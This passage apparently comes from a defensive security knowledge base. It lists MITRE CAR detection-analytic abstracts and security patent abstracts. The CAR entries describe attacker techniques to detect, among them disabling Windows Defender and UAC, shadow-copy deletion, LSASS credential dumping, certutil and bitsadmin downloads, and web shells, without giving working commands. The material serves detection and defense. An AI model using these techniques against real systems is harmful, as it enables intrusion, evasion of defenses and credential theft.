  • "CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe"

Usage (5)

kb-abstract

  • "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-006: Unusual Child Process spawned using DDE exploit - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-006: Unusual Child Process spawned using DDE exploit"

Usage (5)

kb-abstract

  • "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using “sc” [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network."

kb-author

  • "MITRE"

kb-mitre-analysis

  • "d"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt"

Usage (5)

kb-abstract

  • "Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-008: Disable UAC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-008: Disable UAC"

Usage (5)

kb-abstract

  • "After compromising a network of systems, threat actors often try to delete Shadow Copies in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. Non-detection of this technique, which is often employed by ransomware strains such as “Olympic Destroyer”, may lead to a failure in recovering systems after an attack."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe"

Usage (5)

kb-abstract

  • "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gateway into a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-02-001: Webshell-Indicative Process Tree - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-02-001: Webshell-Indicative Process Tree"

Usage (5)

kb-abstract

  • "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to “Get System”, which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connect an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-02-002: Get System Elevation - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-02-002: Get System Elevation"

Usage (5)

kb-abstract

  • "Masquerading (T1036) is defined by ATT&CK as follows:

    “Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.”

    Malware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. lsass.exe, svchost.exe, etc).

    There are several sub-techniques, but this analytic focuses on Match Legitimate Name or Location only."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-04-001: Common Windows Process Masquerading - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-04-001: Common Windows Process Masquerading"

Usage (5)

kb-abstract

  • "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. This action may be the precursor to malicious activity."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store"

Usage (5)

kb-abstract

  • "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-002: Batch File Write to System32 - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-002: Batch File Write to System32"

Usage (5)

kb-abstract

  • "This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-003: BCDEdit Failure Recovery Modification - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-003: BCDEdit Failure Recovery Modification"

Usage (5)

kb-abstract

  • "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. These are typically seen combined in a one-liner or run in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use bitsadmin /list /verbose to list out the jobs during investigation."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-004: BITS Job Persistence - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-004: BITS Job Persistence"

Usage (5)

kb-abstract

  • "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe using the transfer parameter to download a remote object. In addition, look for download or upload on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from bitsadmin.exe, but the artifacts will appear in a parallel process of svchost.exe with a command-line similar to svchost.exe -k netsvcs -s BITS. It’s important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use bitsadmin /list /verbose to list out the jobs during investigation."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-005: BITSAdmin Download File - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-005: BITSAdmin Download File"

Usage (5)

kb-abstract

  • "Certutil.exe may download a file from a remote destination using -urlcache. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. However, it is uncommon for certutil.exe to write files to world writeable paths. During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments"

Usage (5)

kb-abstract

  • "Certutil.exe may download a file from a remote destination using -VerifyCtl. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using -VerifyCtl, the file will either be written to the current working directory or %APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\<hash>."

rdfs:label

  • "Reference - CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments"

Usage (5)

kb-abstract

  • "This search looks for arguments to certutil.exe indicating the manipulation or extraction of a certificate. This certificate can then be used to sign new authentication tokens, especially inside federated environments such as Windows ADFS."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-008: Certutil exe certificate extraction - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-008: Certutil exe certificate extraction"

Usage (5)

kb-abstract

  • "CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-009: CertUtil With Decode Argument - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-009: CertUtil With Decode Argument"

Usage (5)

kb-abstract

  • "This search looks for the creation of local administrator accounts using net.exe."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-010: Create local admin accounts using net exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-010: Create local admin accounts using net exe"

Usage (5)

kb-abstract

  • "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-011: Create Remote Thread into LSASS - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-011: Create Remote Thread into LSASS"

Usage (5)

kb-abstract

  • "An apparatus is equipped to automatically update one or more integrity references of a software entity, when the software entity is installed onto the apparatus. The apparatus is further equipped to periodically determine whether the integrity of the apparatus has been compromised based at least in part on the one or more integrity references of the software entity that are automatically updated during installation of the software entity."

kb-author

  • "Thomas Good, Robert DiFalco, Gene Kim"

kb-mitre-analysis

  • ""

kb-organization

  • "Tripwire, Inc."

rdfs:label

  • "Reference - Computing apparatus with automatic integrity reference generation and maintenance - Tripwire, Inc."

kb-reference-of

kb-reference-title

  • "Computing apparatus with automatic integrity reference generation and maintenance"

Usage (5)

kb-abstract

  • "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and unwanted software. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. The system can extract content of interest from a file container, repackage the content of interest as another valid file type, perform hashes on the content of interest, associate the hash of the container with the hash of the repackaged content, transfer the repackaged content, and store the hash with other security-related information."

kb-author

  • "Todd Brennan"

kb-mitre-analysis

  • ""

kb-organization

  • "Bit 9 Inc, Carbon Black Inc"

rdfs:label

  • "Reference - Content extractor and analysis system - Bit 9 Inc, Carbon Black Inc"

kb-reference-of

kb-reference-title

  • "Content extractor and analysis system"

Usage (5)

kb-abstract

  • "This paper describes a simple, software based keyboard monitoring system for the IBM PC for the continuous analysis of the typing characteristics of the user for the purpose of continuous authentication. By exploiting the electrical characteristics of the PC keyboard interface together with modifications to the internal system timer, very accurate measurements can be made of keystroke interval and duration, including measurements of rollover. Rollover patterns, particularly when typing common diphthongs, can be highly characteristic of individual users and provide quite an accurate indication of the user's identity.
    Published in: European Convention on Security and Detection, 1995."

kb-author

  • "S.J. Shepherd"

kb-mitre-analysis

  • ""

kb-organization

  • "Bradford Univ., UK"

rdfs:label

  • "Reference - Continuous authentication by analysis of keyboard typing characteristics - Bradford Univ., UK"

kb-reference-of

kb-reference-title

  • "Continuous authentication by analysis of keyboard typing characteristics"

Usage (5)

kb-abstract

  • "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating systems (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.

    In order to convince the potential attacker that the deception environment is the real (valid) processing environment and/or part thereof, the campaign manager may construct the false identity according to the public information of the certain user that may typically be available to the potential attacker. By exposing the real (public) information of the certain user to the potential attacker, the false identity may seem consistent and legitimate to the potential attacker. For example, the campaign manager may create a false account, for example, a Facebook account of the certain user that includes the same public information that is publicly available to other Facebook users from the real (genuine) Facebook account of the certain user. The fake company account may include information specific to the role and/or job title of the certain user within the company, for example, a programmer, an accountant, an IT person and/or the like."

kb-author

  • "Dean Sysman, Gadi Evron, Imri Goldberg, Itamar Sher, Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria, Inc."

rdfs:label

  • "Reference - Decoy and deceptive data object technology - Cymmetria, Inc."

kb-reference-of

kb-reference-title

  • "Decoy and deceptive data object technology"

Usage (5)

kb-abstract

  • "Approaches for launching an application within a virtual machine. In response to receiving a request to launch an application, a device instantiates, without human intervention and based on a policy, a virtual machine in which the application is to be launched. The policy determines which resources of a device, such as a mobile device or computer system, are accessible to the virtual machine. The policy may, but need not, determine whether the virtual machine has access to a type of resource which obligates the user of the device to make a monetary payment for the use of the resource."

kb-author

  • "Gaurav Banga, Sergei Vorobiev, Deepak Khajuria, Vikram Kapoor, Ian Pratt, Simon Crosby, Adrian Taylor"

kb-mitre-analysis

  • ""

kb-organization

  • "Bromium, Inc."

rdfs:label

  • "Reference - Isolation of applications within a virtual machine - Bromium, Inc."

kb-reference-of

kb-reference-title

  • "Isolation of applications within a virtual machine"

Usage (5)

kb-abstract

  • "A computer implemented method of detecting unauthorized access to a protected network from external endpoints, comprising monitoring, at a protected network, communication with one or more external endpoints using one or more access clients to access one or more of a plurality of resources of the protected network, where one or more deception resources created in the protected network map one or more of the plurality of resources, detecting usage of data contained in one or more of a plurality of deception data objects deployed in the one or more access clients by monitoring an interaction triggered by one or more of the deception data objects with the one or more deception resources when used and identifying one or more potential unauthorized operations based on analysis of the detection."

kb-author

  • "Gadi EVRON; Dean SYSMAN; Imri Goldberg; Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria, Inc."

rdfs:label

  • "Reference - Supply chain cyber-deception - Cymmetria, Inc."

kb-reference-of

kb-reference-title

  • "Supply chain cyber-deception"

Usage (5)

kb-abstract

  • "The present disclosure is directed to a system, method, and computer program for detecting and assessing security risks in an enterprise's computer network. A behavior model is built for a user in the network based on the user's interactions with the network, wherein a behavior model for a user indicates client device(s), server(s), and resources used by the user. The user's behavior during a period of time is compared to the user's behavior model. A risk assessment is calculated for the period of time based at least in part on the comparison between the user's behavior and the user's behavior model, wherein any one of certain anomalies between the user's behavior and the user's behavior model increase the risk assessment."

kb-author

  • "Sylvain Gil; Domingo Mihovilovic; Nir Polak; Magnus Stensmo; Sing Yip"

kb-mitre-analysis

  • "This patent describes calculating a risk score to detect anomalies in user activity based on comparing a user's current session with a user behavior model. The user behavior model is comprised of a number of histograms including:

    * client devices from which the user logs in
    * servers accessed
    * data accessed
    * applications accessed
    * session duration
    * logon time of day
    * logon day of week
    * geo-location of logon origination

    The system has an initial training period of x days (e.g., 90 days) in which session data is recorded in behavior models before behavior analysis begins. The histograms are then used to determine anomalies between current session activity and a user's behavior model. Values for a histogram category are along one axis and the number of times the value is received for the category is along another axis. If a data point value associated with the current user session is over an anomaly threshold, an alert is generated."

kb-organization

  • "Exabeam Inc"

rdfs:label

  • "Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc"

kb-reference-of

kb-reference-title

  • "System, method, and computer program product for detecting and assessing security risks in a network"

Usage (5)